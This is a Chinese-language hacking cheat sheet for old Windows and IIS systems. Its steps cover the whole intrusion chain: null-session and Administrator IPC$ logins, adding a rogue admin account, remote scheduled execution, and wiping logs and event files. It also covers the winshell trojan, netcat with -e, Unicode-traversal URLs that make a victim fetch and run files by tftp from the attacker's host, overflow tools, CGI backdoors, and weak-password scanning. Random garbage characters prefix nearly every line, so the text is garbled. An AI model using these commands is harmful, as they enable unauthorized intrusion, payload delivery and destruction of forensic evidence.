网管和黑客都必须知道的命令
^ALR.N+< 常用的几条NET命令:
]N#%exBVo 4xl}kmvv
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
jjTb:Z=.' v "Yo (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
id=:J7!QU $KAOJc4< (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
0^G5 zQlj xkPH_+4i8 (查看远程主机时间) net time \\IP地址
JsY|Fv !o{>[ (定时启动某个程序) at \\IP地址 02:18 readme.exe
(;(P3h g=q1@ ) (查看共享) net view \\IP地址
&?wNL@n ] l@Mo7|w (查看netbios工作组列表) nbtstat -A IP地址
#ts;s\! )^q7s&p/ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
_
!r]** GyP.;$NHa[ (这两条把自己增加到管理员组): net user 用户名 密码 /add
7#G8qh< 8
mFy9{M net localgroup Administrators 用户名 /add
EsK.g/d tpQ?E<O (断开连接) net use \\IP地址\ipc$ /delete
[]#>r
k~ kbcqUE 扫尾:
mR|;}u;d +/|;<K5_LI del C:\winnt\system32\logfiles\*.*
jVxX! V 9% wVE] del C:\winnt\ssytem32\config\*.evt
UFOUkS
F #@^mA{Dt5 del C:\winnt\system32\dtclog\*.*
\YN(rD- 6_vhBYLf del C:\winnt\system32\*.log
w1 5QqhlK UifuRmn del C:\winnt\system32\*.txt
_f1~r^(/T0 9=FqI50{ del C:\winnt\*.txt
q wd7vYBc, M0$wTmXM del C:\winnt\*.log
#eZm)KFQg [i 7^a/e 一、netsvc.exe
Zp'q;h_ K>_~zW nc 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
Dqz9NB *F)+- BB netsvc /list \\IP地址
]@G$L,3 a* GiLq netsvc schedule \\IP地址 /query
) h>H}wDs ~;ZT<eCIA netsvc \\IP地址 schedule /start
QswbIP/>:' gK
Uci 二、OpenTelnet.exe
5+yT{,(5 =|Vm69 远程启动主机的Telnet服务,并绑定端口到7878,例如:
zc4l{+3 6%Ws>H4@| OpenTelnet \\IP地址 用户名 密码 1 7878
qy$1+>f1 9s9_a4t5 然后就可以telnet到主机的7878端口,进入DOS方式下:
E|`JmfLQu tY>_+)oi telnet IP地址 7878
g6V>_| o
/ i
W% 三、winshell.exe
jph"94 G0^,@jF?b 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
-s5>GwZt 2"IsNbWV p Path (查看winshell主程序的路径信息)
}(-2a*Z;Y %<?U`o@* b reBoot (重新启动机器)
S)L(~N1 L4) d shutDown (关闭机器)
z!>
H^v Z}NMDb:t
s Shell (执行后你就会看到可爱的“C:\>”)
RX6s[uQ x+;"(]# x eXit (退出本次登录会话,此命令并不终止winshell的运行)
Y[p Rk(2|I CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
)Co&(;zf f0Zn31c^ 四、3389登陆器,GUI方式登录远程主机的
z pV+W-j] JA(M'&q4 五、elsave.exe
k}tTl 2 UL<*z!y 事件日志清除工具
oy<
q;' }bM=)eUfX elsave -s \\IP地址 -l "application" -C
DI,8y"!5 !c#~g0H+ elsave -s \\IP地址 -l "system" -C
9%MHIY5 S#g=;hD elsave -s \\IP地址 -l "security" -C
){S/h<4m .Km6
(U 执行后成功清除应用程序日志,系统日志,安全日志
j 5{"j -ZKo/N>6} 六、hbulot.exe
j$Unw ?V>{3 开启win2kserver和winxp的3389服务
;c;5O@R}3 S(MVL!Lm hbulot [/r]
x}(p\Efx =(%+S<} 使用/r表示安装完成后自动重起目标使设置生效。
%hO/2u '"~ 2xiin 七、nc.exe(netcat.exe)
KDUa0$" 4qe!+!#$ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
lemE/(`a_ KBSO^<7 想要连接到某处: nc [-options] hostname port[s] [ports] ...
SIr^\iiOB B33H,e) 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
Y-vLEIX= R[Y{pT,AY 参数:
R3\oLT4 a-(OAzQ_ -e prog 程序重定向,一旦连接,就执行 [危险!!]
HAOl&\)7"_ v==]v2- -g gateway source-routing hop point[s], up to 8
<-avC/M$d h|OsT -G num source-routing pointer: 4, 8, 12, ...
WK)2/$7@ ;E0aTV)Zp -h 帮助信息
:^H#i:4 c(5r -i secs 延时的间隔
fBZAO <~ 9a3c? -l 监听模式,用于入站连接
nPh|rW= ER4j=O# -n 指定数字的IP地址,不能用hostname
$<QOMfY> fAHf}j -o file 记录16进制的传输
{T2=bK~ fRT4,; -p port 本地端口号
N-cLp}D}WB |y}iOI -r 任意指定本地及远程端口
"pLWJvj6- B!X;T9^d -s addr 本地源地址
F\U^-/0, ,ag:w<km -u UDP模式
V \4zK$] ` 0}z
;&: -v 详细输出——用两个-v可得到更详细的内容
;kv/(veQ1< [n!5!/g>j -w secs timeout的时间
gdKn!; ,w# [Kc"L+H\ -z 将输入输出关掉——用于扫描时
&]xOjv/? 八、TFTPD32.EXE
I&lb5'6D ^w1&A3=6 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
`of`u B i=mk#.j~ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
WPnw ay-M.J 然后可以直接令文件运行:
c"H59 jE (|kcSnF0 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
~n<U8cm O x;;
= +)Gg 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
dvLO #o{ KDQqN]rg 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Yfotq9.=+ gZ b+m 一、一 Xscan命令行运行参数说明:
-<MA\iSP :\sz`p?EC 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
nz%{hMNYH 7F!(60xY 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
k.MAX8 oMNgyAp^ xscan -file <主机列表文件名> <检测项目> [其他选项]
&R7N^*He wEu"X 其中<检测项目> 含义如下:
ML9nfB^z! F4T}HY>nZ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
9f/RD?(1O U|2*.''+Q -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
%;0l1X I]dt1iXu_{ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
I0v$3BQ4 iT;~0XU7F -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
[@RJ2q$ N~/D| ?P~2 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
NrTK+6 z 1>wQ&{ [其他选项] 含义如下:
g~#HiBgWq[ ZM$}Xy\9 -v: 显示详细扫描进度
FR%u1fi 72;4 -p: 跳过Ping不通的主机
A"$UU6Z4 Aqp$JM
> -o: 跳过没有检测到开放端口的主机
FdZG%N>Z :p6.v>s8 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10